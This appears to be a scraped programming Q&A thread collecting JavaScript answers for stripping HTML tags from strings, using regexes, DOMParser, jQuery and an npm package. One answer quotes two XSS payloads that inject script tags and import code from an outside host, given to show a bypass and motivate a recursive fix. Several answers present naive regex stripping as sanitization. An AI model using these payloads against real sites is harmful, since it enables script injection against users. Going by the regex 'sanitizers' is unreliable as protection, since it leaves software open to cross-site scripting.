Doesn't work, please always mention the browser you are using when posting an answer. This is inaccurate and won't work in Chrome 61. Tags are just rendered as a string. – vdegenne Oct 02 '17 at 13:26
const getTextFromHtml = (t) =>
t
?.split('>')
?.map((i) => i.split('<')[0])
.filter((i) => !i.includes('=') && i.trim())
.join('');
const test = '<p>This <strong>one</strong> <em>time</em>,</p><br /><blockquote>I went to</blockquote><ul><li>band <a href="https://workingclasshistory.com" rel="noopener noreferrer" target="_blank">camp</a>…</li></ul><p>I edited this as a reviewer just to double check</p>'
getTextFromHtml(test)
// 'This onetime,I went toband camp…I edited this as a reviewer just to double check'

As others suggested, I recommend using DOMParser when possible.
However, if you happen to be working inside a Node/JS Lambda, or DOMParser is otherwise not available, I came up with the regex below to match most of the scenarios mentioned in previous answers/comments. It doesn't match &gt; and &lt;, which some others may be concerned about, but it should capture pretty much any other scenario.
const dangerousText = '?';
const htmlTagRegex = /<\/?([a-zA-Z]\s?)*?([a-zA-Z]+?=\s?".*")*?([\s/]*?)>/gi;
const sanitizedText = dangerousText.replace(htmlTagRegex, '');
This might be easy to simplify, but it should work for most situations. Hope it helps someone.
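For environments without DOMParser, a regex is not the only option. Below is a minimal sketch of a character scanner, assuming a hypothetical helper name stripTagsScan (not part of the answer above). It only treats `<` as the start of a tag when a letter, `/`, `!` or `?` follows, and it ignores `>` inside quoted attribute values. It does not decode entities and does not treat comments or script contents specially, so it is not a sanitizer.

```javascript
// Hypothetical helper: removes tag-like spans by scanning characters.
function stripTagsScan(input) {
  const s = String(input);
  let out = '';
  let i = 0;
  while (i < s.length) {
    const ch = s[i];
    // Only treat '<' as a tag start when a letter, '/', '!' or '?' follows.
    if (ch === '<' && /[a-zA-Z\/!?]/.test(s[i + 1] || '')) {
      let quote = null; // quote character while inside an attribute value
      i++;
      while (i < s.length) {
        const c = s[i];
        if (quote) {
          if (c === quote) quote = null;
        } else if (c === '"' || c === "'") {
          quote = c;
        } else if (c === '>') {
          break; // end of the tag
        }
        i++;
      }
      i++; // step past the closing '>' (or past the end if the tag never closes)
    } else {
      out += ch;
      i++;
    }
  }
  return out;
}

console.log(stripTagsScan('<a title="x > y">link</a> and 1 < 2'));
// 'link and 1 < 2'
```

An unterminated tag such as 'text<b' drops everything from the `<` to the end of the string, which errs on the side of removing too much.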

-
`'Test'.replace(/<\/?([a-zA-Z]\s?)*?([a-zA-Z]+?=\s?".*")*?([\s/]*?)>/gi, '')` – Kody Apr 05 '22 at 22:09
-
`'
Test'.replace(/<\/?([a-zA-Z]\s?)*?([a-zA-Z]+?=\s?".*")*?([\s/]*?)>/gi, '')` – Kody Apr 05 '22 at 22:09
This pattern also handles escaped characters:
myString.replace(/((&lt)|(<)(?:.|\n)*?(&gt)|(>))/gm, '');

https://developer.mozilla.org/en-US/docs/Web/API/Element/insertAdjacentHTML
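// getElementsByTagName returns a live collection, so keep unwrapping the first div until none remain
var divs = document.getElementsByTagName('div');
while (divs.length > 0) {
var div = divs[0];
div.insertAdjacentHTML('afterend', div.innerHTML);
div.parentNode.removeChild(div);
}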

method 1:
function cleanHTML(str){
return str.replace(/<(?<=<)(.*?)(?=>)>/g, '&lt;$1&gt;');
}
function uncleanHTML(str){
return str.replace(/&lt;(?<=&lt;)(.*?)(?=&gt;)&gt;/g, '<$1>');
}
method 2:
function cleanHTML(str){
return str.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}
function uncleanHTML(str){
return str.replace(/&lt;/g, '<').replace(/&gt;/g, '>');
}
Also, don't forget that if the user happens to post a math comment (e.g. 1 < 2), you don't want to strip the whole comment. The browser (only tested in Chrome) doesn't run escaped entities as HTML tags. If you replace every < with &lt; everywhere in the string, the entity will display < as text without running any HTML. I recommend method 2. jQuery also works well: $('#element').text();
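Method 2 is escaping rather than stripping. Here is a minimal sketch of that idea, assuming a hypothetical helper name escapeHtml and assuming that ampersands and quotes should be escaped too (the answer itself only mentions < and >):

```javascript
// Hypothetical helper (not from the answer above): escapes the characters
// that are significant in HTML so the text is displayed instead of parsed.
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, '&amp;') // must run first so later entities are not double-escaped
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

console.log(escapeHtml('1 < 2 & <b>bold</b>'));
// '1 &lt; 2 &amp; &lt;b&gt;bold&lt;/b&gt;'
```

The math comment survives intact, and the markup is shown as text rather than removed.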

var STR='<Your HTML STRING>';
var HTMLParsedText="";
var resultSet = STR.split('>')
var resultSetLength =resultSet.length
var counter=0
while(resultSetLength>0)
{
if(resultSet[counter].indexOf('<')>0)
{
var value = resultSet[counter];
value=value.substring(0, resultSet[counter].indexOf('<'))
if (resultSet[counter].indexOf('&')>=0 && resultSet[counter].indexOf(';')>=0) {
value=value.replace(value.substring(resultSet[counter].indexOf('&'), resultSet[counter].indexOf(';')+1),'')
}
}
if (value)
{
value = value.trim();
if(HTMLParsedText === "")
{
HTMLParsedText = value;
}
else
{
if (value) {
HTMLParsedText = HTMLParsedText + "\n" + value;
}
}
value='';
}
counter= counter+1;
resultSetLength=resultSetLength-1;
}
console.log(HTMLParsedText);

This package works really well for stripping HTML: https://www.npmjs.com/package/string-strip-html
It works in both the browser and on the server (e.g. Node.js).

You can strip out all the html tags with the following regex: /<(.|\n)*?>/g
Example:
let str = "<font class=\"ClsName\">int[0]</font><font class=\"StrLit\">()</font>";
console.log(str.replace(/<(.|\n)*?>/g, ''));
Output:
int[0]()

Additionally, if you want to strip the HTML from a string and preserve the line breaks, you can use this:
function stripHTML(string) {
let doc = new DOMParser().parseFromString(string, 'text/html');
let textLines = [];
// Collect the text of each top-level node in the parsed body
doc.body.childNodes.forEach((childNode) => {
textLines.push(childNode.textContent || '');
});
let result = textLines.join('<br>');
return result;
}
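Where DOMParser is not available, a rough regex-based approximation of the same goal is possible. This sketch swaps in a different technique from the answer above: it turns `<br>` and a handful of closing block tags into newlines before removing the remaining tags. The helper name stripKeepingLineBreaks and the list of block tags are assumptions for illustration, and it carries the usual caveats of regex-based stripping.

```javascript
// Hypothetical helper: keeps line structure as '\n' while removing tags.
function stripKeepingLineBreaks(html) {
  return String(html)
    .replace(/<br\s*\/?>/gi, '\n')               // explicit line breaks
    .replace(/<\/(p|div|li|h[1-6])\s*>/gi, '\n') // end of common block elements
    .replace(/<[^>]*>/g, '')                     // everything else that looks like a tag
    .replace(/\n{2,}/g, '\n')                    // collapse runs of blank lines
    .trim();
}

console.log(JSON.stringify(stripKeepingLineBreaks('<p>one</p><p>two<br>three</p>')));
// "one\ntwo\nthree"
```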

To add to the DOMParser solution: our team found that it was still possible to inject malicious script using the basic solution.
\"><script>document.write('<img src=//X55.is onload=import(src)>');</script>'
\"><script>document.write('\"><script>document.write('\"><img src=//X55.is onload=import(src)>');</script>');</script>
We found that it was best to parse it recursively if any tags still exist after the initial parse.
function stripHTML(str) {
const parsedHTML = new DOMParser().parseFromString(str, "text/html");
const text = parsedHTML.body.textContent;
if (/(<([^>]+)>)/gi.test(text)) {
return stripHTML(text);
}
return text || "";
}
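The same "strip again while tags remain" idea can be sketched outside the browser. This version is an illustration only: it uses a regex in place of DOMParser (an assumption, not what the answer does) and the hypothetical name stripUntilStable. It loops until a pass changes nothing, which matters for input where removing one tag splices a new one together.

```javascript
// Hypothetical helper: repeats a simple tag-stripping pass until the
// string stops changing (a fixed point).
function stripUntilStable(input) {
  let current = String(input);
  let previous;
  do {
    previous = current;
    // One pass: remove anything of the form <...> with no nested angle brackets
    current = current.replace(/<[^<>]*>/g, '');
  } while (current !== previous); // every changing pass shortens the string, so this terminates
  return current;
}

console.log(stripUntilStable('<scr<script>ipt>alert(42)</scr</script>ipt>'));
// 'alert(42)'
```

A single pass over that input would leave `<script>alert(42)</script>` behind; the second pass removes it.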

(function($){
$.html2text = function(html) {
// Create the hidden scratch element once, using the same id that is read below
if($('#scratch_pad').length === 0) {
$('<div id="scratch_pad"></div>').appendTo('body');
}
return $('#scratch_pad').html(html).text();
};
})(jQuery);
Define this as a jQuery plugin and use it as follows:
$.html2text(htmlContent);

-
Lets say this comes from user input. It can be used to add script or macros to your page – Oluwatumbi Jul 14 '18 at 13:26
function strip_html_tags(str)
{
if ((str===null) || (str===''))
return false;
else
str = str.toString();
return str.replace(/<[^>]*>/g, '');
}

-
Rolling your own like this is at best a half-solution because this will just nuke the `
` newlines and remove other meaningful information. It removes angle brackets and their interiors from a body of text which leaves you in an inconsistent state. Plus the non angle-bracketed HTML code wouldn't be affected. This is a start I guess, but a function to do this would be at minimum several hundred lines. – Eric Leschinski Jul 05 '18 at 05:30
's between text. And that could concatenate the text together, if there should not be any blank spaces between the
's the preceding text and/or the following text – Jan 30 '13 at 06:41